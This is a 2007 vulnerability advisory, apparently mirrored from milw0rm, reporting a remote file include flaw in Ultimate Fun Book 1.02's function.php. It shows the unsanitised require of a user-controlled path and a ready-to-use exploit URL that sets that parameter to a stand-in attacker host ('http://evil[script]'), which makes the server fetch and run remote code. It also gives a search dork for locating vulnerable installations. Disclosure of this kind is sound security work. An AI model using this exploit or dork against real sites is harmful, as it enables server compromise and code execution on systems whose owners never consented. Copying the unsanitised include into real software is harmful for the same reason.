Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16155
HistoryFeb 23, 2007 - 12:00 a.m.

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability:

2007-02-2300:00:00
vulners.com
24

Ultimate Fun Book 1.02
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

thanx= x0r0n,str0ke,shakia**


milw0rm.com [2007-02-20]